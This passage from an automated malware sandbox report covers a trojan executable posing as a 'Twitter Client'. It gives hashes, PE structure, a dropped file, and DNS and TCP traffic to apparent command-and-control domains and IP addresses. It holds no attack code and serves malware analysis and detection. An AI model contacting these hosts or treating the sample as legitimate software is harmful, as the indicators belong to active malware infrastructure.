                                                                                          https://twitter.com/3cGH9Bakuq.exefalse
                                                                                            		high
                                                                                            http://www.carterandcone.comh3cGH9Bakuq.exe, 00000000.00000003.667722258.0000000005686000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.zhongyicts.com.cnh3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c3cGH9Bakuq.exefalse
                                                                                              		high
                                                                                              https://api.twitter.com/1.1/statuses/update.json3cGH9Bakuq.exefalse
                                                                                                		high
                                                                                                http://050005.voodoo.com/js/partner.jscolorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.carterandcone.coml3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://api.twitter.com/1.1/users/lookup.json3cGH9Bakuq.exefalse
                                                                                                    		high
                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlN3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.founder.com.cn/cn3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.fontbureau.com/designers/frere-user.html3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://api.twitter.com/1.1/statuses/show.json3cGH9Bakuq.exefalse
                                                                                                          		high
                                                                                                          http://www.fontbureau.com/designers/cabarga.html3cGH9Bakuq.exe, 00000000.00000003.673691153.00000000056BD000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.comt3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.jiyu-kobo.co.jp/3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.fontbureau.com/designers83cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.twitter.com/1.1/favorites/create.json3cGH9Bakuq.exefalse
                                                                                                                		high
                                                                                                                https://api.twitter.com/oauth/authorize?oauth_token=3cGH9Bakuq.exefalse
                                                                                                                  		high
                                                                                                                  https://api.twitter.com/1.1/direct_messages.json3cGH9Bakuq.exefalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers/3cGH9Bakuq.exe, 00000000.00000003.670846550.00000000056BD000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://api.twitter.com/1.1/friends/ids.json3cGH9Bakuq.exefalse
                                                                                                                        		high
                                                                                                                        https://api.twitter.com/1.1/favorites/list.json3cGH9Bakuq.exefalse
                                                                                                                          		high
                                                                                                                          https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.3cGH9Bakuq.exefalse
                                                                                                                            		high
                                                                                                                            https://api.twitter.com/oauth/request_token3cGH9Bakuq.exefalse
                                                                                                                              		high

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.143.9.211
                                                                                                                              		www.vetpipes.comUnited States
                                                                                                                              		64200VIVIDHOSTINGUSfalse
                                                                                                                              143.198.15.243
                                                                                                                              		marmorariapiramide.onlineUnited States
                                                                                                                              		15557LDCOMNETFRfalse
                                                                                                                              154.208.82.163
                                                                                                                              		www.omniriot.comSeychelles
                                                                                                                              		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                              103.11.189.189
                                                                                                                              		www.rangerbuddys.comSingapore
                                                                                                                              		58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGfalse

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                              Analysis ID:491574
                                                                                                                              Start date:27.09.2021
                                                                                                                              Start time:18:02:45
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 13m 36s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:3cGH9Bakuq (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.evad.winEXE@10/1@6/4
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 40.3% (good quality ratio 35.4%)
                                                                                                                              • Quality average: 72.3%
                                                                                                                              • Quality standard deviation: 32.9%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              • Number of executed functions: 50
                                                                                                                              • Number of non-executed functions: 120
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 13.107.4.50, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                                                                                                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, b1ns.c-0001.c-msedge.net, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              18:03:49API Interceptor1x Sleep call for process: 3cGH9Bakuq.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              No context

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASN

                                                                                                                              No context

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3cGH9Bakuq.exe.log
                                                                                                                              Process:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.355304211458859
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                              Malicious:true
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.294961182646713
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              File name:3cGH9Bakuq.exe
                                                                                                                              File size:626688
                                                                                                                              MD5:0eca879131a7b104418b085db7f761c3
                                                                                                                              SHA1:07fa4692aa15a409091bc6190bf33b5942db99e6
                                                                                                                              SHA256:166559731ad15341f955bf8a16708f93542bef868c33f02f70e9b27f57b991a3
                                                                                                                              SHA512:952420118839a1aa8fb2c498910d784aeacb2a9ed953845415e7c523c41f0d3755ec6fcda769e6045c0677d4a002d86b278876b877fc058054f95774b15332ab
                                                                                                                              SSDEEP:12288:BB6AGIF/OXu5OtiBIZzG/NoC9NPNIQt5XyGY0:JGIF3wOI5G1oCXPzTVY
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x49a282
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                              Time Stamp:0x61518E8B [Mon Sep 27 09:27:39 2021 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9a2300x4f.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x618.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000x982880x98400False0.721873717159data7.30848087754IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x9c0000x6180x800False0.3349609375data3.46990850393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x9e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_VERSION0x9c0900x386data
                                                                                                                              RT_MANIFEST0x9c4280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Version Infos

                                                                                                                              DescriptionData
                                                                                                                              Translation0x0000 0x04b0
                                                                                                                              LegalCopyrightCopyright 2016 - 2021 Hanalen
                                                                                                                              Assembly Version0.28.3.1
                                                                                                                              InternalNameMCMWrapperDictiona.exe
                                                                                                                              FileVersion0.28.3.1
                                                                                                                              CompanyName
                                                                                                                              LegalTrademarks
                                                                                                                              Comments
                                                                                                                              ProductNameTwitter Client
                                                                                                                              ProductVersion0.28.3.1
                                                                                                                              FileDescriptionTwitter Client
                                                                                                                              OriginalFilenameMCMWrapperDictiona.exe

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Sep 27, 2021 18:05:11.529373884 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.636533022 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.636631966 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.636744022 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.743427038 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757265091 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757296085 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757431984 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.757507086 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.864582062 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:16.957498074 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.177325964 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.177617073 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.177975893 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.396378040 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.686033010 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.898016930 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.898099899 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:27.853636026 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.029695988 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.029774904 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.029920101 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.206176996 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208403111 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208427906 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208453894 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208621025 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.208658934 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.208756924 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:38.487253904 CEST4980880192.168.2.4143.198.15.243
                                                                                                                              Sep 27, 2021 18:05:41.500272989 CEST4980880192.168.2.4143.198.15.243
                                                                                                                              Sep 27, 2021 18:05:47.500781059 CEST4980880192.168.2.4143.198.15.243

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Sep 27, 2021 18:03:35.164730072 CEST4971453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:03:35.182537079 CEST53497148.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:06.959781885 CEST5802853192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:06.990171909 CEST53580288.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:25.512123108 CEST5309753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:25.526983023 CEST53530978.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:26.600256920 CEST4925753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:26.621587038 CEST53492578.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:28.010369062 CEST6238953192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:28.077197075 CEST53623898.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:28.841510057 CEST4991053192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:28.942997932 CEST53499108.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:29.523184061 CEST5585453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:29.552921057 CEST53558548.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:29.564763069 CEST6454953192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:29.577709913 CEST53645498.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:30.001899004 CEST6315353192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:30.014921904 CEST53631538.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:30.823194981 CEST5299153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:30.836411953 CEST53529918.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:31.864636898 CEST5370053192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:31.877384901 CEST53537008.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:33.357884884 CEST5172653192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:33.430949926 CEST53517268.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:36.017194986 CEST5679453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:36.117326975 CEST53567948.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:36.820691109 CEST5653453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:36.925689936 CEST53565348.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:38.028016090 CEST5662753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:38.088311911 CEST53566278.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:46.045958042 CEST5662153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:46.064748049 CEST53566218.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:06.173321009 CEST6311653192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:06.195317984 CEST53631168.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.418425083 CEST6407853192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST53640788.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:16.769006014 CEST6480153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:16.955238104 CEST53648018.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:27.743536949 CEST6172153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:27.852567911 CEST53617218.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:33.223629951 CEST5125553192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:33.266285896 CEST53512558.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:38.286906958 CEST6152253192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST53615228.8.8.8192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Sep 27, 2021 18:05:06.173321009 CEST192.168.2.48.8.8.80x7514Standard query (0)www.emptycc.netA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.418425083 CEST192.168.2.48.8.8.80xc089Standard query (0)www.vetpipes.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:16.769006014 CEST192.168.2.48.8.8.80x5964Standard query (0)www.omniriot.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:27.743536949 CEST192.168.2.48.8.8.80x354fStandard query (0)www.rangerbuddys.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:33.223629951 CEST192.168.2.48.8.8.80x5b1eStandard query (0)www.traexcel.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.286906958 CEST192.168.2.48.8.8.80x6940Standard query (0)www.marmorariapiramide.onlineA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Sep 27, 2021 18:05:06.195317984 CEST8.8.8.8192.168.2.40x7514Name error (3)www.emptycc.netnonenoneA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST8.8.8.8192.168.2.40xc089No error (0)www.vetpipes.com104.143.9.211A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST8.8.8.8192.168.2.40xc089No error (0)www.vetpipes.com104.143.9.210A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:16.955238104 CEST8.8.8.8192.168.2.40x5964No error (0)www.omniriot.com154.208.82.163A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:27.852567911 CEST8.8.8.8192.168.2.40x354fNo error (0)www.rangerbuddys.com103.11.189.189A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:33.266285896 CEST8.8.8.8192.168.2.40x5b1eName error (3)www.traexcel.comnonenoneA (IP address)IN (0x0001)
